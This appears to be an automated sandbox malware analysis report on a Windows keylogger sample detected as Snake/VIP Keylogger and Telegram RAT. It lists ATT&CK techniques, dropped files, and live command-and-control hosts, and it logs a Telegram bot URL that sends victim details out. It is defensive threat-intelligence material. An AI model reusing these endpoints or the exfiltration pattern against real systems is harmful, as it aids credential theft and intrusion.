Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4473996288.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: WIpGif4IRrFfamQ.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AcEnrS.exe PID: 7708, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WIpGif4IRrFfamQ.exe	47%	ReversingLabs	Win32.Spyware.Snakekeylogger
WIpGif4IRrFfamQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\AcEnrS.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\AcEnrS.exe	47%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
mail.pymetal.net	75.102.58.14	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20a	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.office.com/lB	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r10.o.lencr.org0#	WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000003002000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enx	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.pymetal.net	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/x	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?L	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://x1.c.lencr.org/0	WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	AcEnrS.exe, 0000000E.00000002.2402217603.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	WIpGif4IRrFfamQ.exe, 00000000.00000002.2061901731.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2111265878.0000000002701000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2402217603.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	WIpGif4IRrFfamQ.exe, 00000009.00000002.4477766999.0000000003E31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://r10.i.lencr.org/0	WIpGif4IRrFfamQ.exe, 00000009.00000002.4480635628.00000000066B0000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4471835088.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002F4B000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4469911274.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	WIpGif4IRrFfamQ.exe, 00000000.00000002.2062530842.0000000004C66000.00000004.00000800.00020000.00000000.sdmp, WIpGif4IRrFfamQ.exe, 00000009.00000002.4473996288.0000000002E62000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp, AcEnrS.exe, 0000000E.00000002.2400557396.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
75.102.58.14	mail.pymetal.net	United States	23352	SERVERCENTRALUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523246
Start date and time:	2024-10-01 10:54:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WIpGif4IRrFfamQ.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/19@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 125 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AcEnrS.exe, PID 7708 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: WIpGif4IRrFfamQ.exe

Simulations

Behavior and APIs

Time	Type	Description
04:54:55	API Interceptor	10825648x Sleep call for process: WIpGif4IRrFfamQ.exe modified
04:54:58	API Interceptor	59x Sleep call for process: powershell.exe modified
04:55:02	API Interceptor	1x Sleep call for process: AcEnrS.exe modified
04:55:34	API Interceptor	1x Sleep call for process: WerFault.exe modified
10:54:58	Task Scheduler	Run new task: AcEnrS path: C:\Users\user\AppData\Roaming\AcEnrS.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	RFQ-00032035.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	invoice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.16913.10158.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SWIFT_COPY_-024-172700818106527.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse
	https://contact-us-business-help-home-64844114956.on-fleek.app/	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	BX7yRz7XqF.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	cloud.dellicon.top/1000/500/
	jKSjtQ8W7O.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/7vun/
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	http://meta.case-page-appeal.eu/community-standard/208273899187123/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	9q24V7OSys.exe	Get hash	malicious	FormBook	Browse	www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/mfctuvFf/download
	http://brawllstars.ru/	Get hash	malicious	HTMLPhisher	Browse	brawllstars.ru/
	http://aktiivasi-paylaterr.from-resmi.com/	Get hash	malicious	Unknown	Browse	aktiivasi-paylaterr.from-resmi.com/
	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	homker11.uebki.one/GeneratorTest.php
193.122.6.168	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	REMITTANCE ADVICE.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	z1Invoice1.bat.exe	Get hash	malicious	VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	CANADAXORDER.xls	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	RFQ-00032035.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
